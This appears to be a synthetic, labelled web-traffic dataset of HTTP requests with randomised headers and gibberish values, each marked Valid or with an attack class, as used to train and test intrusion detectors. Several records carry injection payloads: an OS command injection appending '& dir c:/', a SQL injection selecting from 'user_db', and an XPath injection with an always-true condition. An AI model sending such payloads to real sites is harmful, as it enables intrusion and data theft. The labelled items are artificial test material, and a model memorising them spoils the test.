GET /ngiRmE/ZEWNEh2wRlz.cfm?kI5wnwwarushhen=ad3a&1tLis6e8tethUas=bjtItrwewNsoani&ihtx=passwdA&7orsiaeisl=90960&jJMbpn534=7605042&edeatleur3dtr8i=3133&bl4NFDoxiUs=her&tEe7m2hfel=nyspno5sock_streamm%3FI&yndaizbaotahe=g&tpsinpbwn3tcx=hgJW&blnmhs4doro=6975688&roaewoEteo5io=d.4_d.Gid&ueSYhnis=0hnn9ieghS&r1tcCihsesc=iegimor&NinhXXTKyHV=0158 HTTP/1.1
Host: 38.236.248.152
Connection: keep-alive
Accept: text/*
Accept-Charset: windows-874;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: tiosu8Vd-otHrf;q=0.3, S-MLtS;q=0.4
Cache-Control: max-age=34
Client-ip: 49.160.169.51
Cookie: toa8cidnn=595917;tgsaM=ip3 m;ReK5K=tt0oaanowt;duuh2Xn0rpe9hen=09997272;ssSttmDeatariu=;selectwwp-elog upn2esboot.inig:0;eempaohfgf4t=tmpimmFskt2w
Cookie2: $Version="13"
Date: Mon, 26 May 08 18:16:57 UTC
ETag: "yLF_9eVimBS7ymwy1hq"
Expect: 100-continue
From: 4a8k@ilaedTEuh.net
If-Modified-Since: Fri, 07 Oct 05 19:54:04 UTC
If-Unmodified-Since: Wed, 16 Jan 08 10:41:12 UTC
If-Match: *
If-None-Match: "krm-@in@X8nG8yITgj"
If-Range: *
Max-Forwards: 3
MIME-Version: 7.1
Pragma: pieojr9t=2aoA
Proxy-Authorization: peo1 et1n=eacseu
Authorization: NTLM c2UxTHVsczc4bmlua3NwdGhma2k3aXVMcjlMbWVjZUVqeGRzTmVk
Range: 373155-704,-1740,72564-298
Referer: http://7nim.com/uDdoSwn/p80n/rtgr/4frlsnan.jpg
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: siJkmq.I http://www.eFoy.uk
UA-CPU: x86
UA-Disp: 0720,076,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 238x900
Via: HTTP/3.3 www.zrrusAr.jpeg, FTP/4.5 131.141.86.56:06
Transfer-Encoding: gAut
Upgrade: bhgp/1.7
Warning: 832 12.107.153.6 "o9em3ihrbeRs" 
X-Forwarded-For: 123.28.90.45
X-Serial-Number: 5490878161111
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1389
Start - Id: 43675
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.0
Host: www.3iighoieu.ch:80
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: identity, deflate, deflate
Accept-Language: *;q=0.8
Cache-Control: min-fresh=3
Client-ip: 123.220.31.165
Cookie: Ignj=9Sur;whl6fsnl0R9er=hqo13bsode1i;wa7= mac;nestahnxaa=tt;Deryer3hrms5Tst=:p/:;yWRb_J0Mobject1=935
Cookie2: $Version="617"
Date: Sun, 14 Mar 10 23:59:22 GMT
ETag: W/"JuItTc2d.8lOL.2tXyLL"
Expect: l9owie
From: r63aj@miwmhwde.ch
If-Modified-Since: Wed, 27 Feb 08 19:17:13 UTC
If-Unmodified-Since: Mon, 14 May 07 06:24:17 GMT
If-Match: "uZEImgwAnn6.GHfE8NC"
If-None-Match: *
If-Range: Sun, 31 Jul 05 13:20:23 GMT
Max-Forwards: 2532
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest username="gvaaal"
Authorization: Digest algorithm=MD5
Range: 42-91,822939-,-31
Referer: /oeaJd/diefl/ndpeih/hMibstaa/wwib.mdb
TE: trailers,chunked
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 5.5; gE-gr; rv:4.6.2) Gecko/84186775
UA-CPU: x86
UA-Pixels: 697x5821
Via: FTP/6.3 131.121.137.220
Transfer-Encoding: identity
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 267 17.232.146.208 "uEwtOaeI" "Fri, 11 Sep 09 24:54:08 CET"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 84513190969177426
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43675
Start - Id: 23994
class: Valid
GET /gjw_S/xqRAyTUYPzz/tfSgpositionB1.S/tatectatftsn/ecOsxrm/uli4lghakosho3dwTro/uwYrOYhlfk2vxY1ZW/ea1r6/tn5EdW3EKOqCI@dam/ryh4bw0@1lMW3No9/eshftt55oUwwgfstA/aEQT49A13l-JmTn.css?Ayl=tW1nA.T25_&36Io4sMZ1t=2d&6nvesa=dlri+%28n&edWIbtauoU=343&wss=eG0n1Mxi&MMeK7T=ofNDhrfhaw24b&Esneneienhhgul=-ta&Bv0catHK=r5handhm&lh=34801&6_YlibwF=-orn&dyohmispuznam8=%2F%5Dtxtermhusrt%40%26os&0-JxY9Aatu6=48943&D6mUs=046&Leo0=%5Cc%5D HTTP/1.1
Host: 236.100.91.34
Connection: stelcnn
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: qige1-Eld9n;q=0.0, oone-dnjge;q=0.8, he-LUardo;q=0.8, rp-lsba, xea-u8t0r8
Cache-Control: no-transform
Client-ip: 86.105.32.149
Cookie: 2cteeTreo9=)2rra;lMdropuiKPIallqmochaJ=8275;WCFLCKunion5l1=7080
Cookie2: $Version="193"
Date: Mon, 17 Oct 05 16:13:52 GMT
ETag: "3SedFYmE7BvFCyEuj4u"
Expect: daaAa=mvhm;eteomdls
From: rESt9@oraehs.ch
If-Modified-Since: Tue, 03 May 05 24:42:35 CET
If-Unmodified-Since: Sat, 27 Jan 07 21:33:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Mar 04 15:32:48 GMT
Max-Forwards: 83
MIME-Version: 6.3
Pragma: dar=twehdu1
Proxy-Authorization: NTLM a2dDM2Fvcmllc3Rlc25hdG1tbG1hY3cyYXF5NXQ5ZTJ0Y28wb3RF
Authorization: Basic ZXR3ZGlmOkxuc3Nl
Range: 57-083666,74376-4577,088-
Referer: http://bvwzAaob.fr/RhExa6/reTIa/lts2dm.nsf
TE: trailers
Trailer: From
User-Agent: ikHMdHum http://www.ssew.net
UA-CPU: StrongARM
UA-Disp: 5815,0896,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 087x1525
Via: HTTP/1.1 128.15.121.89, HTTP/8.0 www.oidslay.gif:409
Transfer-Encoding: edced; ne0c=hqagsxct
Upgrade: miguh/0.4
Warning: 674 www.rCinamAg.tiff "hotntasfbspfip" 
X-Forwarded-For: 53.58.146.5
X-Serial-Number: 336999
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 23994
Start - Id: 30913
class: Valid
GET /NhfcesTmrolea2aatnr/OKYxp_6WxRHzUqKrH/aJgKExRPPWMKp/hjaDM8.jlxtu_9h/1O9fRk@Qr/lkw@hauP.9shRVZNi4n/JP/o6fa.png?and=akJTWTsxql-G&eahrnuoped=ljjs&U66BV=tNjqj&t0do=+%250a&itwmso=vmeta%24linkh&gtt3ai3Eeeeaap=tuhchaevwsP HTTP/1.1
Host: 173.51.47.136
Connection: oebrdico
Accept: audio/*, image/*;q=0.4, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-store
Client-ip: 160.152.0.185
Cookie: atcmf=4578;trhepglgpk5e=0684;nu=oasnanUoj
Cookie2: $Version="325"
Date: Wed, 19 Jan 05 14:10:34 GMT
ETag: "e05Egf3UopcwH1RI8"
Expect: 100-continue
From: O35r@NAzet.cz
If-Modified-Since: Tue, 27 Jul 04 04:19:37 UTC
If-Unmodified-Since: Mon, 19 Sep 05 04:47:29 GMT
If-Match: "zkQMtf08nT9_CYL-"
If-None-Match: "klqsX.4M36dY6Qg3m"
If-Range: "euzalFh@qJVl3l5"
Max-Forwards: 281
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest response="f67048dCe4247596B7aAb3BFcCEF5eD9"
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 7-19547,727449-
Referer: http://www.enpi6.cz/mtNaOsi/enoaH.exe
TE: chunked;q=0.5,chunked,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 5.5; aO-et; rv:4.5.9) Gecko/63440765
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: vcu/1.9 www.meizr.shtml:54, FTP/6.7 www.ayios.html, FTP/4.8 www.jl3xddea.htm
Transfer-Encoding: compress
Upgrade: ru3a/6.6, gtg/5.4, ich7fe/8.7, yar7r/9.3
Warning: 364 www.n0ehr.css:691 "oEieijPwonreuaI" "Thu, 15 May 08 10:24:17 UTC"
X-Forwarded-For: 59.233.149.239
X-Serial-Number: 535265474092814212
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30913
Start - Id: 1428
class: Valid
GET /oNb5yud8s5/inAtye0iIfec9aume8/tcan0irclDrefu5/aBG75luy/jpdropsUFNc7elsL/eMM@Pd0BNCj6w0/aetNenxWb/zhVkujMK/uuf9joaaaoloesa/ewccmIelihpeEem/EaibVoeqrlesaoer.png?0GOV=rfe&rcsoidd0ee=6577&itavte8ao15=eqolsss8c7T&0edan1snlt=26&9eleErwq=updateshttpEEaaueHejw6&E0aqz=noiqes&afsqwhvls=%29&HueuoeB0nihn=uIvarstylefloiarl%5Cbrx&nanaakso1mf=btar&ogneco74Bw7h=Zpprneebdt&tya=8766671074&v4ctmau=150744&kG0viframeq=2832 HTTP/1.0
Host: www.ialt.com:80
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-7;q=0.4, x-mac-hebrew, x-mac-greek, iso-8859-5;q=0.0, utf-7;q=0.4
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: max-age=37280
Client-ip: 151.208.70.36
Cookie: eoamkhn4s9Ciatb=enUi2cA0hcux;nEN=269106595;mint=epm6VshH6nn;oeorsw=ewrb9
Cookie2: $Version="5"
Date: Mon, 05 Jun 06 02:14:33 UTC
ETag: "VZWpwdhLnZHVFq@U4"
Expect: eekslmst=tei8
From: etps@nerI.uk
If-Modified-Since: Thu, 18 Jun 09 01:49:45 CET
If-Unmodified-Since: Thu, 26 Oct 06 17:01:40 CET
If-Match: *
If-None-Match: *
If-Range: "WMKbMbiwRfj93-AEl-N"
Max-Forwards: 4190
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aXNlZWFGOmFnc3M=
Authorization: Digest cnonce="wlbemnnm"
Range: 6-15763,0058-47
Referer: /ioxtoo/sduewwvp/rIh1.jpeg
TE: trailers,deflate;q=0.1,trailers
Trailer: Upgrade
User-Agent: cejiudIkn/2.7.8.0
UA-CPU: x86
UA-Disp: 592,845,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 226x4570
Via: xOd/2.3 181.40.235.180:86, HTTP/9.7 88.115.26.112, FTP/6.8 102.81.247.77
Transfer-Encoding: identity
Upgrade: Naoru/5.9, Rztagf/1.1, grf/0.6, usr/4.8, l9i/8.2
Warning: 201 www.cdnmdCi.gif "moas8upgetwih" 
X-Forwarded-For: 112.212.64.188
X-Serial-Number: 1347008
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1428
Start - Id: 25745
class: Valid
GET /eTW-l0wyyoh@B2f1G/jceunehdenhRut3OTl9/hEbelamxdayDiLEnshck/cnin9a17/aoipoeTrDee/gMWd5-MjzIs88-/zwgetmxt3hD/UUd/jlPFv5ET2uRjwxRZu0/mUnetcE.VQ8ctmpbZN/0RAiClhoznCUAkQ7v/6Isrf2weUi.cgi? HTTP/1.0
Host: 138.88.245.242
Connection: pree
Accept: image/gif;q=0.4, application/zip
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.4, gzip;q=0.0, gzip
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 32.43.147.96
Cookie: iagvttrr4oe=97829;sdg=ah;UxtCs7tue=08907147;eto=nqaYUh;SnnErlda=7418448;esrtetrhoe=2124767
Cookie2: $Version="38"
Date: Sun, 03 Aug 08 01:25:59 UTC
ETag: W/"Hd49XJxD5aG5izO-T"
Expect: 100-continue
From: Aboesy@tnEn1d.uk
If-Modified-Since: Wed, 07 Jan 04 19:03:11 UTC
If-Unmodified-Since: Wed, 14 Jan 09 22:43:27 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aW5paHQ6ZW5uOQ==
Authorization: Digest opaque="b4hpoaar"
Range: 03-
Referer: http://Eswkene.st/ogoucw/hyCieqk/euo3/olzsart/asru6n.jsp
TE: gzip;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/8.8 (compatible; Konqueror/7.3; Win98; rrai)
UA-CPU: PowerPC
UA-Disp: 7894,3200,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7472x595
Via: FTP/7.1 www.oldaa.jpg
Transfer-Encoding: identity
Upgrade: ceULo/2.9, itmu/9.5, m6nr5/9.3
Warning: 635 www.9ejeStqe.htm "8o9arHalg5mnumiio9o" "Sat, 25 Oct 08 24:03:25 UTC"
X-Forwarded-For: 1.21.31.218
X-Serial-Number: 21900
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25745
Start - Id: 33435
class: Valid
POST /ceiaxafonatyhnatdrc/S8msseJsIcnklxeie/-CKvbsO9JPxp_qlike/ihxJ-UXY_sO9SF8CzqD/cswit/tiai/tetNoC5h5ttrhln/5Fg7D8-MgkC5xS7/hj0mwtetexex2i6t.cfm? HTTP/1.1
Content-Length: 167
Content-Language: q
Content-Encoding: gzip
Content-Location: http://rmisztae.com/Llhn/mhihb.cfm
Content-MD5: MHNpaXRhaGVhYkVvYWllZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 30 Apr 05 03:57:00 GMT
Last-Modified: Fri, 20 Oct 06 10:30:57 GMT
Host: www.ctuomare.de
Connection: keep-alive
Accept: */*
Accept-Charset: cp-950, shift_jis
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale=33
Client-ip: 117.212.192.32
Cookie: cealNe74tVik=|retmrlseiq
Cookie2: $Version="9"
Date: Thu, 18 May 06 13:33:27 CET
ETag: W/"oUjTWuWquUG@OifHWM"
Expect: lnukihqa
From: airohua@gtscArwrS.org
If-Modified-Since: Tue, 20 Jun 06 05:02:16 GMT
If-Unmodified-Since: Mon, 24 Nov 08 08:46:37 CET
If-Match: "d66BZqDyNqdQVJqHnXe"
If-None-Match: *
If-Range: *
Max-Forwards: 4125
MIME-Version: 5.1
Pragma: tdtne=eirAigtH
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: swkh9 n1Nist=oaelw3
Range: 613993-,2333-,85-
Referer: /Taytrbee/iaBId3i/deoaht.txt
TE: gzip,trailers,trailers
Trailer: Accept-Encoding
User-Agent: sddi/5.2.9.9.9
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: FTP/9.6 www.htO7.tiff
Transfer-Encoding: compress
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 461 223.224.27.140 "qaade4lnwt" "Mon, 04 Sep 06 19:50:31 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 522982707
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

oaiisEofDuu0eeI=%3Bp&mndezrrrrys8ai=342063&K4styleXZ%u=312&TaoOO7u1atn=868200&hln=72822&CYdeCCI=itchonwgph&sed5tl0l=hadcen&@2saJ6J=sau8h%5D5%26eife&outlaf=aescriptp%24

End - Id: 33435
Start - Id: 41653
class: SqlInjection
GET /y1HgalocationR9bgsoundX/g3vf2SR9-lu8pbqf5Bl2/hcAsa5hgWoli/igr7oatrysv.html?6xaewphnrxieal=e6emlsRtrm&arg=5T7sOhRtI&4saguclaRgraI=5461844&ajte=to3nubodybS&vtWo7olcO=%27+or++++id++in++%28+select+*++from++++++user_db++++%29&oJba=7TkKG&45notde8tssai=V%27o&nn2cevii9=69672&0vrr=psln8ands&xgc=elbv22VRaF&d0twj07b3Sd=737002 HTTP/1.0
Host: www.nothkms.be
Connection: z6an
Accept: */*
Accept-Charset: iso-8859-15;q=0.0
Accept-Encoding: *
Accept-Language: t8-no;q=0.0, p-rso
Cache-Control: no-store
Client-ip: 190.249.107.19
Cookie: gottic4yydiwp=97;cgn=000638;oPeibantDeos=4t|;x41del=4633
Cookie2: $Version="0"
Date: Thu, 11 Mar 10 17:39:29 CET
ETag: W/"tK08tBHPggtEMtZ1I-o"
Expect: tt48=sne4our
From: rgcs0@a7Cesos0.be
If-Modified-Since: Fri, 07 Jan 05 04:28:03 UTC
If-Unmodified-Since: Thu, 16 Sep 04 23:48:45 UTC
If-Match: "kuCO08u3.sj9VMq6A_"
If-None-Match: *
If-Range: *
Max-Forwards: 2706
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM bW9zbzZtbGVydGMyZXM3RW1vaXRSNGR1b2hyem51ZXY=
Authorization: eaoes1 nieeosb=otusaf
Range: -11289
Referer: /m7wele/sadt.php4
TE: gzip;q=0.8,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/0.5 (compatible; Konqueror/3.5; Win 9x; g5zDd; ianafuahde)
UA-CPU: MIPS
UA-Disp: 942,8019,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/3.0 34.238.112.46, 7.7 62.112.67.163, FTP/7.5 www.LNtocyi.tiff
Transfer-Encoding: compress
Upgrade: tsa/6.6, neot/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41653
Start - Id: 19154
class: Valid
GET /Oprocessing-instructionORvbin/nteKFynhisnm/iqZLA/TformJZOVzC8Qusrevalj4i/mze/caveed83trdtptswsneo.shtml?tnsisuhvdms=100777&hteteWhihO29b=6615273&efMHeJvaccess_logXK3=Unwy&hNctpi=se7&etadtrLp=%2Bo&7sdE=2666192 HTTP/1.0
Host: 145.38.33.58
Connection: close
Accept: video/*;q=0.0, application/*;q=0.5, image/*
Accept-Charset: utf-7;q=0.8, iso-8859-6, euc-cn;q=0.6, x-mac-hebrew;q=0.6
Accept-Encoding: 
Accept-Language: Izldtei-he6o9h;q=0.9, cotig-peN;q=0.2, 4-o;q=0.2, nnDdt-s;q=0.5, a-nzl
Cache-Control: oxhsh='yu'
Client-ip: 232.206.216.97
Cookie: iYvU=c+eh@;eiEdtsDine0exia=t;eUeoeRysktheeni=gercr
Cookie2: $Version="746"
Date: Fri, 04 May 07 15:18:36 UTC
ETag: W/"eKP35ifDThMvjLc-p"
Expect: 100-continue
From: wgnl@sel6ocu.cz
If-Modified-Since: Wed, 30 Dec 09 05:14:53 CET
If-Unmodified-Since: Fri, 13 Aug 04 03:32:21 CET
If-Match: *
If-None-Match: *
If-Range: "H3VOUp7cnBqy8T9PT3Lo"
Max-Forwards: 8
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: oxea t9llrjyt=m7moteDl
Range: -26751,992963-79665,-06526
Referer: /etRt/irdroa3a/eefD/uked/e5au.conf
TE: deflate;q=0.8,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 5.5; hp-td; rv:3.9.4) Gecko/42958812
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8378x546
Via: FTP/4.0 www.6yii.jpeg, 9fr/5.2 www.eptnm.gif:329
Transfer-Encoding: m32az; anfaaagl=w2reUl
Upgrade: oiv/4.6, cunS0/6.8, iten/9.5, sszmK/2.3, i5od/3.4
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 0241089551352273
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19154
Start - Id: 19176
class: Valid
GET /hu6g-9OEXt2mCo0Rk/eeeculisoahncartfk/8ieyn/uoAdBjliOK.U/uMfIeHws3rnS4/mu1XFR/oi/cdio8A-Ki8BsFIifmuEw/0dzXuGAOo.html?YGkOb_n=letitdplomv&speeeialwi4=jtleaoueantb&k6sv1=usduceabriaq0d&wsewhuo=4oCg9uilcali3ee&gt2wtaeettg=e2vh&74_mandAvbscriptxMlocation=892493&sicH6=l%3Asxlc7n%3Ban&u-jFVA0aD=9773139898&petlaxt1=rP%40jpYWdf&OEaoRcsen=euniono5i&mdn=to0YaLhKPk6 HTTP/1.1
Host: 115.109.91.79
Connection: keep-alive
Accept: image/png;q=0.7, audio/x-wav, video/mpeg;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: uyThoo-jv9tDae;q=0.6, h2-a8R1damf;q=0.2
Cache-Control: no-store
Client-ip: 68.134.240.21
Cookie: Esieyu0nensi=xvqsoestMg32Rai;too4drj0f=hq.;ro3ewaalhyaxde=91306;eoqab9nseeNtts=ofx;nYaatalnoHorrsn=8
Cookie2: $Version="5"
Date: Thu, 08 Jul 04 05:57:30 GMT
ETag: "yB-iVxAP-lgk3@L"
Expect: 100-continue
From: ToNpsn@tvfalhel.biz
If-Modified-Since: Sat, 19 Apr 08 03:02:21 CET
If-Unmodified-Since: Mon, 19 Oct 09 07:52:49 UTC
If-Match: "U.4MZjPVi1iW.LQ"
If-None-Match: "77i5Wj1XM-MJ8wEUxFi"
If-Range: "nkS.pK5cqoLCxhV.1"
Max-Forwards: 7
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic UnJhcDl0OmFhdHNlbmQ=
Authorization: Lfyfo snmw=ecaqeor
Range: 13883-,898-1,-8
Referer: http://www.bejceiu.be/eysoEsle/rlrm/aiAr/Tnor/sbnei.fgf
TE: trailers,deflate;q=0.7,gzip;q=0.9
Trailer: Referer
User-Agent: Mozilla/7.5 (X11; U; Solaris 0.3; hr-si; rv:1.9.6) Gecko/34572374
UA-CPU: 68000
UA-Disp: 848,6466,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 923x3383
Via: iryie/6.2 126.119.192.13, 1tolen/3.3 10.121.112.199
Transfer-Encoding: gzip
Upgrade: woeUzU/1.5, tnls/8.6, B9a/0.3
Warning: 614 www.eetaa.js "sstotIsaxxrntd" "Tue, 10 Jun 08 13:53:56 GMT"
X-Forwarded-For: 199.173.139.84
X-Serial-Number: 1861049652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19176
Start - Id: 49307
class: XPathInjection
GET /sVZFo@cxsDTPF5AshL/26/mJHfj4Lij@wuP3cF/s8b5gEKP.dll?jhlsduht=m5disdDsev1nzhene&15ousytieAxLr=rnhoTVip1&l354hHN=hrJn5nerer&sesSi=76900&eomlhRnOkrL=httplqencyeG&hsjlsqseI=Nstice%3Ftdoe7delete&th=t%3Eaftp5W%249he1ar+ch&tattoHeswataOe=pdNlAnLez&wzbuxkx2e=rtso47q%27++++or+++++tiedde%2FN6dcm4%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D677%5D+++or++++%274e%27+%3D%27&5aea40ea=ntol&Cgetttypes=hs&0rsdebofjkutn=2181667&tbtse=%27%5Coen5eaRet HTTP/1.0
Host: 18.94.253.229
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 249.173.49.26
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Mon, 01 May 06 05:44:52 GMT
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 01 Dec 06 23:04:55 UTC
If-Unmodified-Since: Sat, 28 Mar 09 06:34:40 CET
If-Match: "yGnbZNIt3aj4e-NjrEi8"
If-None-Match: *
If-Range: Wed, 09 Aug 06 24:17:31 UTC
Max-Forwards: 143
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZVNFSlU6MDR0bGNl
Range: 762-
Referer: http://edtwtsd.ch/zhhE.rar
TE: deflate;q=0.5,gzip;q=0.0,trailers
Trailer: Date
User-Agent: eeegt5drPy6mtlyrl
UA-CPU: StrongARM
UA-Disp: 284,977,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: 8.7 www.R8ag.htm
Transfer-Encoding: gzip
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 119 www.rMrCoeV.png "areeivlaiau9le2Crr" "Wed, 01 Jul 09 21:10:21 UTC"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 902784
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49307
Start - Id: 5056
class: Valid
PUT /nQVa3Pbody/rasdrGdplh/ozwgVD7GcpREUX/3ewdpaOedco/fCevFMpffvO3SrkhDQt/IsiYGCx5CMadmin-ZHH.js? HTTP/1.1
Content-Length: 77
Content-Language: 4
Content-Encoding: compress
Content-Location: http://flefw.com/reo5nc/bhknza.cfm
Content-MD5: cTBpY0NiaWVsZWlyYWxhbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Aug 08 07:33:06 UTC
Last-Modified: Wed, 04 Feb 09 05:46:25 GMT
Host: www.smznyi.fr
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: utf-8, iso-2022-kr;q=0.5, x-mac-icelandic;q=0.9
Accept-Encoding: 
Accept-Language: tbgmncn-se, i-reac;q=0.0, bvo-2lhfnpt;q=0.6, 0dsstr-sl
Cache-Control: min-fresh=471
Client-ip: 69.30.198.48
Cookie: oarfnbPfuIu= htpassloga7;viaeporm=ptviCntri7;ov=1ozuL3m7NriW
Cookie2: $Version="718"
Date: Wed, 14 Mar 07 02:27:33 UTC
ETag: W/"Fr4JwBk7jCIGOztU2"
Expect: 100-continue
From: tpzRon@ec4slh.de
If-Modified-Since: Thu, 22 Jan 09 19:29:31 GMT
If-Unmodified-Since: Fri, 23 Oct 09 15:21:40 CET
If-Match: "7YaAUBrgvclFlU8o"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 0494
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=8Cd6fc9b
Range: -809077,653-170430,-158191
Referer: /bvkine/udiros/oatehwta/5ndBh/yanjsttv.mspx
TE: chunked;q=0.1,trailers
Trailer: Date
User-Agent: fuVgxsy http://www.6t5isris.be
UA-CPU: PowerPC
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7112x1130
Via: FTP/7.6 www.kIluD.css, 9.6 www.iapashom.htm
Transfer-Encoding: deflate
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 874 50.12.41.154 "oiigh7oztoeetoski3" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 535934521873854374
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

reje2itzlao=nnnatepukt&aeeceZh5pr2=ln$ttlocationo&KMjbRiframer=0664&5ffwn=7

End - Id: 5056
Start - Id: 9234
class: Valid
GET /aHmZ.rdFzp/@iframesh_f.BjGpasswdyM/amXHAN/locationq/dz1BYzL9otTqht.nsf?sinipta=r&edxihemortB3=snhbls&saIi2nnb6os03=s&TC3vWl4=9selectuuw7ty HTTP/1.0
Host: www.nyoqd4.fr
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e29Dt-Emsc;q=0.0, 8ncru-i8Uc
Cache-Control: rcoo=t0d4at
Client-ip: 112.74.37.174
Cookie: o1=cBsnph-aoRsiy;ahntoNuiiaLei=mJhE;ithtrie=22255401;A4tr5=890;lw9orfwt5i8bt=sut;2botpsseda3ofA=ptfgcwmdhcsoO
Cookie2: $Version="118"
Date: Mon, 11 Jan 10 05:06:32 CET
ETag: W/"yXS4nlyg4SL@uP-CfV"
Expect: eenbDm
From: i8stoo@nr5dsaPx.de
If-Modified-Since: Fri, 01 Dec 06 24:25:48 GMT
If-Unmodified-Since: Sun, 25 Mar 07 23:53:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 May 07 14:16:42 UTC
Max-Forwards: 4
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: tinln7 Bhie=n9d9
Authorization: nrtp rcnsa=zehv
Range: 7-,506-547400,2408-38770
Referer: /uNbt/tnmand/ilxux.conf
TE: chunked;q=0.0,gzip
Trailer: If-None-Match
User-Agent: povC1gquh7tpSsru
UA-CPU: Sparc
UA-Disp: 920,831,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 207x2903
Via: 0.2 www.hooP.shtml:53
Transfer-Encoding: compress
